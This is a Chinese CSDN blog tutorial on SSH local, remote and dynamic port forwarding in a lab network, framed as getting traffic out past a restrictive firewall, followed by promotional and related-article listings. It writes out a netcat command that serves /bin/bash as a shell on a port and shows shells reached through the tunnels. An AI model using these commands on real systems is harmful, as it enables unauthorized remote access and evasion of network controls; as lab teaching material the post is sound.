SSH 隧道/端口转发

最新推荐文章于 2024-05-13 11:03:44 发布
最新推荐文章于 2024-05-13 11:03:44 发布
阅读量327 收藏 4
点赞数 5
文章标签: ssh 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/138307495
版权

SSH:本地端口转发

如果不出网的情况接,可以利用本地ssh做转发出网

例如,有一个要访问的主机,但出口防火墙不允许,可以执行以下操作:

 

  1.  
    ssh -L 127.0.0.1:9999:远程主机IP:PORT user@SSH_SERVER
     
 

像这样的就可以把流量转发到本地主机上的127.0.0.1:9999端口。
 这里将流量通过SSH服务转发到了目标远程主机的机器上
 

开始实操
 

在10.0.0.5机器上:
 

 

  1.  
    ssh -L9999:10.0.0.12:4444 root@10.0.0.12 -N -f
     
 

在本地端口 9999 上绑定(在主机 10.0.0.5 上)。监听任何到达该端口 9999(即 127.0.0.1:9999 或 10.0.0.5:9999)的流量,并将其全部转发到主机 10.0.0.12 上的端口 4444:
 我们可以看到 127.0.0.1:9999 现在确实在监听:
 

 

图片
 


 在机器 10.0.0.12 上
 机器 10.0.0.12 正在监听端口 4444 - 它已准备好向任何加入的人提供反向 shell:
 

 

图片
 


 在机器 10.0.0.5 上
 由于机器正在监听 127.0.0.1:9999,让我们对其进行 netcat - 这应该为我们提供来自 10.0.0.12:4444 的反向 shell:
 

 

图片
 


 上面确实表明我们从 10.0.0.12 获得了一个反向 shell,并且本地隧道正常工作。
 

SSH:远程端口转发
 

ssh服务运行在绑定到 127.0.0.1 的端口上,远程端口转发公开了一个模糊的端口(绑定到本地主机),以便可以通过 SSH 隧道从外部访问它。
 使用 ssh 隧道创建远程端口转发的伪语法是:
 

 

  1.  
    ssh -R 5555:LOCAL_HOST:4444 user@SSH_SERVER
     
 

SSHSERVER 上的端口 5555 的任何流量都将转发到 远程主机IP 上的端口 4444 - 运行只能从该主机内部访问的服务的主机。换句话说,远程主机IP 上的 4444 端口上的服务现在将通过 SSHSERVER 的 5555 端口公开。
 

在机器 10.0.0.12 上
 让我们在端口 4444 上创建一个绑定到 127.0.0.1(无法从外部访问主机)的反向 shell 监听器:
 

 

  1.  
    nc -lp 4444 -s 127.0.0.1 -e /bin/bash & ss -lt
     
 

 

图片
 

打开一个到 10.0.0.5 的隧道,并通过为主机 10.0.0.5 公开端口 4444 来创建远程端口转发:
 

 

  1.  
    ssh - R5555 : localhost : 4444 root@ 10.0.0.5 - fN
     
 

上面说:在 10.0.0.5 上绑定一个端口 5555,发送到 10.0.0.5 上的端口 5555 的任何流量都被转发到一个在本地主机上监听的服务:4444 到此框 (10.0.0.12)。
 在机器 10.0.0.5 上
 实际上,作为隧道创建的一部分,我们可以看到在 10.0.0.5 上打开了一个端口 5555:
 

 

图片
 


 流量发送到 127.0.0.1:5555 - 这应该给我们一个来自 10.0.0.12:4444 的反向 shell
 

 

图片
 

SSH:动态端口转发
 

用于创建动态端口转发的伪语法:
 

 

  1.  
    ssh -D 127.0.0.1:9090 user@SSH_SERVER
     
 

本地主机上的端口 9090 以及发送到此端口的任何流量,请将其中继到 SSH_SERVER - 它会为建立连接。
 设置动态端口转发之前检查我们当前的 IP 是什么:
 

 

图片
 


 在本地机器 10.0.0.5 上创建到 159.65.200.10 的 ssh 隧道并绑定端口 9090:
 

 

  1.  
    ssh -D9090 root@159.65.200.10
     
 

 

图片
 


 检查本地主机 10.0.0.5 上的网络连接,我们可以看到端口 9090 现在正在监听:
 

 

图片
 


 我们向 127.0.0.1:9090 发送任何流量,该流量将被发送到 ssh 隧道另一端的主机 - 159.65.200.10,然后主机 159.65.200.10 将代表其他主机建立连接主机 10.0.0.5。它会将收到的任何数据返回给原始主机 10.0.0.5。
 为了对此进行测试,我们可以将浏览器设置为使用 socks5 代理服务器 127.0.0.1:9090,如下所示:
 

 

图片
 


 完事之后,再看看我们的外网IP是多少,可见是:159.65.xx.xx,说明已经成功了
 

 

图片
 

我的SSH内网转发出网到此结束~~~~
 

  声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权
 

免费领取安全学习资料包!
 


 渗透工具
 

技术文档、书籍
 

 

面试题
 

 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 

应急响应笔记
 

 

学习路线
 

 


                

        

        

    




    

      

        

            

              
                
                  黑客大佬
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    5
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    4
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
内网隧道代理技术(三)之使用SSH端口转发

				
			

			

				

					把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
				

				

					06-12
					
					805
					
				

			

		

		

			
				
SSH通过网络远程访问主机提供保护,可以对客户端和服务端之间的数据传输进行压缩和加密,有身份验证、SCP、SFTP、和端口转发的功能。

			
		

	



                

              
                



	

		

			

				
					
ssh隧道端口转发脚本模板

				
			

			

				

					11-25
				

			

		

		

			
				
将目标机端口通过跳板机映射到本地指定端口 中括号内替换为实际值

			
		

	



                


  
              

                


	

		

			

				
					
SSH 端口转发

				
			

			

				

					邵群超的博客
				

				

					10-10
					
					190
					
				

			

		

		

			
				
SSH 端口转发功能能够将其他 TCP 端口的网络数据通过 SSH 链接来转发,并且自动提供了相应的加密及解密服务。其实这一技术就是我们常常听说的隧道(tunnel)技术,原因是 SSH 为其他 TCP 链接提供了一个安全的通道来进行传输。我们知道,FTP 协议是以明文来传递数据的。但是我们可以让 FTP 客户端和服务器通过 SSH 隧道传输数据,从而实现安全的 FTP 数据传输。更常见...

			
		

	





	

		

			

				
					
【渗透测试笔记】之【内网渗透——应用层隧道SSH隧道的使用:本地、远程端口转发(1)

					
最新发布

				
			

			

				

					2401_84970145的博客
				

				

					05-13
					
					541
					
				

			

		

		

			
				
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

			
		

	



		

			
		



	

		

			

				
					
建立SSH隧道SSH端口转发

				
			

			

				

					落叶翩翩的CSDN博客
				

				

					01-29
					
					8917
					
				

			

		

		

			
				
ssh隧道功能,也就是端口转发功能非常好用,可以实现一些代理功能或者是穿透内网功能。
ssh端口转发(或者叫做隧道)命令分为三种:

本地:ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host
远程:ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tu

			
		

	





	

		

			

				
					
SSH配置端口转发(也叫做隧道转发

				
			

			

				

					qq_51688785的博客
				

				

					01-12
					
					800
					
				

			

		

		

			
				
SSH(Secure Shell)是一种加密网络协议,用于在不安全的网络上安全地传输数据。它提供了一个安全的远程访问解决方案,可以通过SSH客户端和SSH服务器之间的加密连接来保护远程会话中传输的数据。

			
		

	





	

		

			

				
					
SSH端口转发ssh隧道

				
			

			

				

					weixin_62621015的博客
				

				

					03-16
					
					2185
					
				

			

		

		

			
				
在打DarkHole2靶机的时候,使用到了ssh端口转发,在网上搜集了很多资料,特此记录下来,以便后续查找。

			
		

	





	

		

			

				
					
SSH端口转发,本地端口转发,远程端口转发,动态端口转发详解

				
			

			

				

					01-10
				

			

		

		

			
				
第一部分 SSH端口转发概述  当你在咖啡馆享受免费 WiFi 的时候,有没有想到可能有人正在窃取你的密码及隐私信息?当你发现实验室的防火墙阻止了你的网络应用端口,是不是有苦难言?来看看 SSH端口转发功能能给...

			
		

	





	

		

			

				
					
SSH远程登录和端口转发详解

				
			

			

				

					09-15
				

			

		

		

			
				
SSH(Secure Shell)是一种网络协议,用于在不安全的网络上提供安全的远程登录和其他网络服务。SSH协议基于应用层和传输层,旨在确保...同时,端口转发功能允许用户安全地通过SSH隧道访问受限制或不安全网络上的服务。

			
		

	





	

		

			

				
					
SSH如何实现本地远程端口转发

				
			

			

				

					10-18
				

			

		

		

			
				
在客户端上,需要使用 SSH 创建本地端口转发隧道。可以使用以下命令:  `ssh -fNL 9527:10.0.0.79:23 10.0.0.38`  这将创建一个从本地客户端的 9527 端口到远程 telnet-server 服务器的 23 端口的隧道。  3. 访问 ...

			
		

	





	

		

			

				
					
linux ssh端口转发的三种方式

				
			

			

				

					01-10
				

			

		

		

			
				
再细想一下,发现ssh隧道、或者说端口转发,竟然实现了正向代理、反向代理和内网穿透三种常用的网络功能,更佩服其功能的强大和使用中的便利。 ssh有三种端口转发模式,本文一一对其做简要介绍。 本地转发  本地端口...

			
		

	





	

		

			

				
					
利用SSH隧道转发X11协议图形界面

				
			

			

				

					05-10
				

			

		

		

			
				
学习过程中get到的非常有用的小技能,X11协议转发,实现Windows下能够通过SSH隧道接收到服务器上的图形界面,环境构建好后,使用便捷,有了X11转发,不必再为服务器安装图形界面,开发必备技能,文档纯手工制作,亲身实践,望大家多多支持!

			
		

	





	

		

			

				
					
SSH隧道详解与使用AutoSSH实现稳定的内网穿透

				
			

			

				

					qq_16583855的博客
				

				

					11-15
					
					2121
					
				

			

		

		

			
				
一、前言



SSH 是一种建立在应用层基础上的安全协议,利用SSH进行数据传输时也是较为可靠和安全的。当有明文数据传输时,为保障其安全,可以利用SSH隧道对其进行加密安全传输,本文中讲到的SSH隧道用法均可以保障安全传输,文中不详做介绍,本文着重讲解除安全传输之外的其他使用场景,来分别分析三种SSH隧道的用法。

文中会用到以下SSH参数,先看一下man文档中对以下SSH参数的解释:

-L port:host:hostport

将本地机(客户机)的某个端口转发到远端指定机器的指定端口. 工作原理是这

			
		

	





	

		

			

				
					
内网渗透(二)——SSH隧道搭建与端口转发

				
			

			

				

					qq_61562251的博客
				

				

					12-10
					
					1819
					
				

			

		

		

			
				
SSH隧道SSH 端口转发又叫 SSH 隧道(tunnel),是在 SSH 连接的基础上,通过将客户端或服务器端的某个端口的数据放到 SSH 连接中加密传输,从而在不安全的网络中安全的传输数据或者绕过防火墙的限制实现对目的主机目的端口的访问的一个功能。前提是需要对方开启ssh服务,并且知道对方的ssh账号和密码不同的后端站点所拿到的shell权限是不一样的。php、aspx的权限是继承中间件的,需要提权。是最低权限,而Java确实最高权限,无需提权。参数前提——ssh配置。

			
		

	





	

		

			

				
					
SSH端口转发隧道

				
			

			

				

					a19860903的专栏
				

				

					11-17
					
					533
					
				

			

		

		

			
				
SSH端口转发(Port Forwarding),是一种隧道技术,流往某端口的数据被加密后传向另一机器,依据转发方式的不同,有多种应用场景。[1][2]

以下所有的命令都是用SSH客户端执行的。执行命令的电脑下面称为“本地”电脑;而“远程服务器”则是运行着SSH服务器的机器(本文以my-remote-host.com为例)。






目录
[隐藏]


1 本地转发

			
		

	





	

		

			

				
					
ssh 隧道端口转发工具Rinetd

				
			

			

				

					weixin_51140072的博客
				

				

					11-02
					
					196
					
				

			

		

		

			
				
ssh 隧道 Rinetd工具转发 测试有效


			
		

	





	

		

			

				
					
ssh隧道详解,ssh端口转发详解

				
			

			

				

					hanyun9988的博客
				

				

					06-26
					
					3051
					
				

			

		

		

			
				
          转发自:http://www.zsythink.net/archives/2450            ssh隧道详解,ssh端口转发详解      版权声明:本站原创文章,于2017年12月26日16:10:21,由 朱双印 发表,共 9450 字。如需转载,请联系作者:ssh端口转发ssh隧道 | 朱双印博客              35-44 分钟         ...

			
		

	





	

		

			

				
					
ssh隧道原理及三种隧道转发模式

				
			

			

				

					qq_38844490的博客
				

				

					09-09
					
					4349
					
				

			

		

		

			
				
端口转发SSH协议的一项功能,它允许您在其中一个主机上指定一个端口,并将该端口上的网络连接转发到另一台主机上的端口,使用SSH连接作为代理。端口转发可以实现功能:1. 本地转发远端。通过跳板机访问远端内网服务器。2. 远端转发本地。内网穿透。3. 动态端口转发

			
		

	





	

		

			

				
					
细说SSH隧道——本地端口转发

					
热门推荐

				
			

			

				

					LainWith的博客
				

				

					05-30
					
					1万+
					
				

			

		

		

			
				
目录前言本地端口转发举例1:服务器与SSH远程主机是分开的命令网络拓扑环境配置开始连接(-L连接)登录用户流量分析办公网(VM1网卡):外网(NAT-VM8网卡)家庭电脑抓包(eth0网卡)SSH参数的选取【重点】❗❗❗退出了shell之后会怎样静默连接(-N -L)后台静默连接(-f -N -L)最终版(-C -f -N -L)举例2:SSH远程主机是服务器网络拓扑开始连接命令变形举例3:连接远程桌面部署rdesktop开始连接重新连接案例4:把自己共享给所有人办公电脑连接其他电脑连接案例5:基于SSH使

			
		

	





	

		

			

				
					
ssh命令本地端口转发

				
			

			

				

					07-29
				

			

		

		

			
				
这将在本地主机上建立一个监听8080端口的SSH隧道,并将所有流量转发到远程主机的80端口。然后,可以通过在本地浏览器中访问localhost:8080来访问远程主机上的网页服务。\[1\] #### 引用[.reference_title] - *1* *2*...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值